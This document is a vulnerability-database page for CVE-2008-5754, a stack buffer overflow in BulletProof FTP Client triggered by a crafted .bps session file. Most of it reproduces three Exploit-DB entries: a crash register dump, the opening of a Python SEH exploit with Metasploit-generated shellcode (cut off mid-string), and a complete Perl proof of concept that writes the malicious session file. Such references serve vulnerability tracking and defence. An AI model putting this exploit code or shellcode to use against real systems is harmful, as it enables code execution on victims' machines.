CVE-2008-5754
published 2008-12-30CVE-2008-5754: Stack-based buffer overflow in BulletProof FTP Client allows user-assisted attackers to execute arbitrary code via a .bps file (aka Session-File) with a long…
PriorityP341critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
4.58%
90.5th percentile
Stack-based buffer overflow in BulletProof FTP Client allows user-assisted attackers to execute arbitrary code via a .bps file (aka Session-File) with a long second line, possibly a related issue to CVE-2008-5753.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| bpftp | bulletproof_ftp_client | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
BulletProof FTP Client 2.63 b56 - '.bps' File Stack Buffer Overflow
exploitdb·2009-10-07
CVE-2008-5754 BulletProof FTP Client 2.63 b56 - '.bps' File Stack Buffer Overflow
BulletProof FTP Client 2.63 b56 - '.bps' File Stack Buffer Overflow
---
/*
BulletProof FTP Client suffer a buffer overflow (SEH).
Tested on BullerProof FTP Client v. 2.63 build 56 (The last one) but may work with older releases as well
Registers:
EAX 00000000
ECX 65646362
EDX 7C9032BC ntdll.7C9032BC
EBX 00000000
ESP 0012F1E0
EBP 0012F200
ESI 00000000
EDI 00000000
EIP 65646362
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 1 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDF000(FFF)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
ST0 empty -??? FFFF 00FF00FF 00FF00FF
ST1 empty -??? FFFF 00FF00FF 00FF00FF
ST2 empty -??? FFFF 000000F3 00F300F3
ST3 empty -??? FFFF 000000F3 00F300F3
ST4 empty -??? F
Exploit-DB
BulletProof FTP Client 2009 - '.bps' Local Buffer Overflow (SEH)
exploitdb·2009-04-13
CVE-2008-5754 BulletProof FTP Client 2009 - '.bps' Local Buffer Overflow (SEH)
BulletProof FTP Client 2009 - '.bps' Local Buffer Overflow (SEH)
---
#!/usr/bin/python
#[*] Bug : BulletProof FTP Client 2009 (.bps) Buffer Overflow Exploit (SEH)
#[*] Credits : Stack
#[*] Tested on : Xp sp2 (fr)
#[*] Exploited by : His0k4
#[*] Greetings : All friends & muslims HaCkErs (DZ),snakespc.com,secdz.com
#[*] Chi3arona houa : Serra7 merra7,koulchi mderra7 :D
#[*] translate by Cyb3r-1st: esse7 embe7 embou :D
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode=(
"\x33\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x71"
"\x4f\xd8\x8d\x83\xeb\xfc\xe2\xf4\x8d\xa7\x9c\x8d\x71\x4f\x53\xc8"
"\x4d\xc4\xa4\x88\x09\x4e\x37\x06\x3e\x57\x53\xd2\x51\x4e\x33\xc4"
"\xfa\x7b\x53\x8c\x9f\x7e\x18\x14\xdd\xcb\x18\xf9\x76\x8e\x12\x80"
"\x70\x
Exploit-DB
BulletProof FTP Client - '.bps' Local Stack Overflow (PoC)
exploitdb·2008-12-28
CVE-2008-5754 BulletProof FTP Client - '.bps' Local Stack Overflow (PoC)
BulletProof FTP Client - '.bps' Local Stack Overflow (PoC)
---
#!/usr/bin/perl
########################################
#[*] Bug : BulletProof FTP Client .bps Local Stack Overflow (PoC)
#[*] Founded by : Mountassif Moad
#[*] Greetz : All Freind Str0ke
#[*] HOw to use => go to file after Load BP session & Enter and boom :d overflowing :d
########################################
use warnings;
use strict;
my $chars = "This is a BulletProof FTP Client Session-File and should not be modified directly.\n" .
"\x41" x 100 .
"\n21\n".
"Stack\n".
"bpfhljamedaldlffpojmqhpo\n".
"c:\/\n" .
"/\n";
my $file="Stack.bps";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created \n";
print "Credits:Stack";
# milw0rm.com [2008-12-28]
No writeups or analysis indexed.
2008-12-30
Published